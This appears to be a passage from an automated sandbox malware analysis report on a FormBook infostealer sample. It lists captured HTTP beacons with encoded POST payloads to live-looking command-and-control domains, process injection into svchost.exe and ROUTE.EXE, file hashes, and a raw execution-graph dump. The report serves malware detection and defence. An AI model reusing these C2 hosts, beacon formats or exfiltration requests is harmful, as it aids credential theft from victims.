                                                          24 | 192.168.2.9 | 49999 | 13.248.169.48 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:33.403079987 CET | 486 | OUT | GET /m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:33.879479885 CET | 372 | IN | HTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Fri, 10 Jan 2025 22:07:33 GMT
                                                          content-length: 251
                                                          connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw=="}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.9 | 50000 | 160.25.166.123 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:39.399435043 CET | 733 | OUT | POST /74m3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1Sc0IvflCr5V0j3OdZxBxtDhx/7n123xhkG25CiNd2qlYU9qYfE00B599dPx0aRWQV3v/rsVE+VYAJHqGCRKNmsF5GwjUuY79VOCt/PuXCiUS4C45aUAlbezBrFRwIrgSWmSqtTJnjEfCVU8w1usYZLGHt4RhEihQT+Cy7mPBziiNEDg/
                                                          Jan 10, 2025 23:07:40.376097918 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:40 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:40.376245975 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.9 | 50001 | 160.25.166.123 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:41.951749086 CET | 757 | OUT | POST /74m3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1R/8Iu8NC+pVzsXOdXRB1tCdx/5Xl3FVhlnG5Dn5d6KlYfdrzRk0/B5x1dNl0aV+QV2f/qdVH/FYCS3qIGRKNmsF5GxH+uZT9V+yt9tGULCURsS45eUApbez/rHpJIpYSWieqtH9m6UfAY08u0cYTare9oL1gSy5Nd/+sqUGam1iqDkpXdjn6cJWs/cZ269nCc7EqPA==
                                                          Jan 10, 2025 23:07:42.946168900 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:42 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:42.946202993 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.9 | 50002 | 160.25.166.123 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:44.510704994 CET | 1770 | OUT | POST /74m3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1R/8Iu8NC+pVzsXOdXRB1tCdx/5Xl3FdhlRy5CAld5KlYS9qURk0YB5pxdN4BaX2QVQD/jI1H0FYCaXqJCRLPms19GxX+uZT9V8qtrvuUNCUS4C4PaUB+bebvrB1ZLdkSVGyqr0VmyUfGWU990cFLaryboKBKSxZNcqbh30bC+WO9AXNjCDGdbJXFtJBGqtaSa4R9Qclt+Gu6TiNlKfN6u6iCMR3+Y8tx5sJbG858IeIMl9D4D3e54uDzbNVaNBGHGmSwdjya+zEbWnZWafe7skaIEoazqGJXXJahwkV5BQ9OmG/pZW67lS3bm3C6Yad6h6xpQijol58CY9izNx9sMQp407lzv28V3ZxZRnXWrxY0DZ20e+OiMhsusmJ2tfKNy56kSbVbVeYkYoW+0Jnc9uDvo2b+IcFJC7W0nIHGI8br5WkzvKRVOHn3rM8rArJvv6tnsLX7CCiG8O8e4Lcj8GOYxVXO0LY43o07WGdmpzuLGLauvDkdwFZcjSKFCTw6vupptIKtlPr8D7jssGy2I3VNoX1U5Ss9QaYdO7ftBEd5jZA/VoDUOonHAluddyb5TqG9Ccx35WXG+r8xM7n742j9YK8PurlhliCi/IDZ8bnjbfmVZPH55W06pNPm1t9Kqc6SdV5KITn+WxHIEjn2EFIljPSSn8KIFGp+aRJRJyAdwq9S5VzrZxhg1L1utS+3onUJUPc2sT65CteZjJD853g9o8bcLKIHsusSWRKpjsiocy4Q5+18NBkCQHXdA7/dIDtOGdMIpxmA2fJb6mw+SkRFLqQ8D9T3YBixRgNIXUlc3WQuymSOd9AgJlMgMPBhrQTlN/EBCbMpUGVg8raPNZ3aESRApIdil/xAfhOzlw4qQUuArX/NBrbXZ7T+2e74n62Fbdoyw4hr3K9WiLxslcLkgggGJB01sbxpvQcGx8VMAegeD3bS01cDosRFB9wQqTbLU08UZk7COuDzRFVrZw4lnMMXiSxy [TRUNCATED]
                                                          Jan 10, 2025 23:07:45.439198017 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:45 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:45.439220905 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.9 | 50003 | 160.25.166.123 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:47.061144114 CET | 477 | OUT | GET /74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:48.025239944 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:47 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:48.025269985 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.9 | 50004 | 68.66.226.119 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:53.111351967 CET | 745 | OUT | POST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=zpgu76N3IzQrnDJsvyxIrQw/5/xduI3v9SJGJlCl1VLpv+yUhaHBOQS70+9PX/XOScFBUOevvdBW+w9bjxpHINrD8CjnVSz1TBeJDg8orbfVLZnAlHHQJmgw8FtecUuwuiRQPaIQsxuzIb8MiGySSJ6cJ9xlxu3IEQazFM2lO+CLCdkz9i9UaH6OWBs0
                                                          Jan 10, 2025 23:07:53.660692930 CET | 605 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:53 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.9 | 50005 | 68.66.226.119 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:07:55.658931017 CET | 769 | OUT | POST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je=zpgu76N3IzQrmj5ssVlIpww81fxdko2m9SFGJnyL2nvpua2UmfzBCwS7+e8FafXJScJ3ULmvvclW+ylbjApAL9rB0ijlLiz1TBeJDgp/rYvVIo3Aki7XV2g31lteYUu8uiRiPbU+szmzIZ0MhSGVcJ6gHdwvg9OlHnORD+qbeoSUMcYtsQ0PPQ6pRmlc6W6qTM3C61etqWKleWLK2Q==
                                                          Timestamp: Jan 10, 2025 23:07:56.232325077 CET
                                                          Bytes transferred: 605
                                                          Direction: IN
                                                          Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:56 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID: 31
                                                          Source IP: 192.168.2.9
                                                          Source Port: 50006
                                                          Destination IP: 68.66.226.119
                                                          Destination Port: 80

                                                          Timestamp: Jan 10, 2025 23:07:58.674493074 CET
                                                          Bytes transferred: 1782
                                                          Direction: OUT
                                                          Data:
                                                          POST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Ascii: bdi02je= [TRUNCATED]
                                                          Timestamp: Jan 10, 2025 23:07:59.239759922 CET
                                                          Bytes transferred: 605
                                                          Direction: IN
                                                          Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:59 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Target ID:0
                                                          Start time:17:04:51
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\gH3LlhcRzg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\gH3LlhcRzg.exe"
                                                          Imagebase:0xcd0000
                                                          File size:1'187'328 bytes
                                                          MD5 hash:A238864F937038D6FE39092719A1EFF0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:17:04:52
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\gH3LlhcRzg.exe"
                                                          Imagebase:0x740000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:17:05:17
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe"
                                                          Imagebase:0x7a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:17:05:19
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                          Imagebase:0x980000
                                                          File size:19'456 bytes
                                                          MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:17:05:32
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe"
                                                          Imagebase:0x7a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:17:05:44
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff73feb0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:3.3%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:7.6%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:155
59 API calls 104506->104508 104510 d0d30a 104508->104510 104511 d0d320 GetForegroundWindow ShellExecuteW 104509->104511 104732 cd7b2e 104510->104732 104515 d0d354 Mailbox 104511->104515 104515->104504 104516 cd7cab 59 API calls 104516->104511 104517->104456 104518->104461 104519->104463 104521 cd7667 59 API calls 104520->104521 104522 cd377c 104521->104522 104741 cd3d31 104522->104741 104524 cd379a 104525 cd4706 61 API calls 104524->104525 104526 cd37ae 104525->104526 104527 cd7de1 59 API calls 104526->104527 104528 cd37bb 104527->104528 104755 cd4ddd 104528->104755 104531 cd37dc Mailbox 104779 cd8047 104531->104779 104532 d0d173 104826 d3955b 104532->104826 104535 d0d192 104538 cf2d55 _free 58 API calls 104535->104538 104540 d0d19f 104538->104540 104542 cd4e4a 84 API calls 104540->104542 104544 d0d1a8 104542->104544 104548 cd3ed0 59 API calls 104544->104548 104545 cd7de1 59 API calls 104546 cd3808 104545->104546 104786 cd84c0 104546->104786 104550 d0d1c3 104548->104550 104549 cd381a Mailbox 104551 cd7de1 59 API calls 104549->104551 104552 cd3ed0 59 API calls 104550->104552 104553 cd3840 104551->104553 104554 d0d1df 104552->104554 104555 cd84c0 69 API calls 104553->104555 104556 cd4706 61 API calls 104554->104556 104558 cd384f Mailbox 104555->104558 104557 d0d204 104556->104557 104559 cd3ed0 59 API calls 104557->104559 104561 cd7667 59 API calls 104558->104561 104560 d0d210 104559->104560 104562 cd8047 59 API calls 104560->104562 104563 cd386d 104561->104563 104564 d0d21e 104562->104564 104790 cd3ed0 104563->104790 104566 cd3ed0 59 API calls 104564->104566 104569 d0d22d 104566->104569 104574 cd8047 59 API calls 104569->104574 104570 cd3887 104570->104544 104571 cd3891 104570->104571 104572 cf2efd _W_store_winword 60 API calls 104571->104572 104573 cd389c 104572->104573 104573->104550 104575 cd38a6 104573->104575 104576 d0d24f 104574->104576 104577 cf2efd _W_store_winword 60 API calls 104575->104577 104578 cd3ed0 59 API calls 104576->104578 104579 cd38b1 
104577->104579 104580 d0d25c 104578->104580 104579->104554 104581 cd38bb 104579->104581 104580->104580 104582 cf2efd _W_store_winword 60 API calls 104581->104582 104583 cd38c6 104582->104583 104583->104569 104584 cd3907 104583->104584 104586 cd3ed0 59 API calls 104583->104586 104584->104569 104585 cd3914 104584->104585 104806 cd92ce 104585->104806 104588 cd38ea 104586->104588 104590 cd8047 59 API calls 104588->104590 104591 cd38f8 104590->104591 104593 cd3ed0 59 API calls 104591->104593 104593->104584 104596 cd928a 59 API calls 104598 cd394f 104596->104598 104597 cd8ee0 60 API calls 104597->104598 104598->104596 104598->104597 104599 cd3ed0 59 API calls 104598->104599 104600 cd3995 Mailbox 104598->104600 104599->104598 104600->104470 104602 cd7292 __write_nolock 104601->104602 104603 d0ea22 _memset 104602->104603 104604 cd72ab 104602->104604 104607 d0ea3e GetOpenFileNameW 104603->104607 104605 cd4750 60 API calls 104604->104605 104606 cd72b4 104605->104606 105446 cf0791 104606->105446 104609 d0ea8d 104607->104609 104610 cd7bcc 59 API calls 104609->104610 104612 d0eaa2 104610->104612 104612->104612 104614 cd72c9 105464 cd686a 104614->105464 104618 ce093a __write_nolock 104617->104618 105716 cd6d80 104618->105716 104620 ce093f 104621 cd3c14 104620->104621 105727 ce119e 89 API calls 104620->105727 104621->104481 104621->104487 104623 ce094c 104623->104621 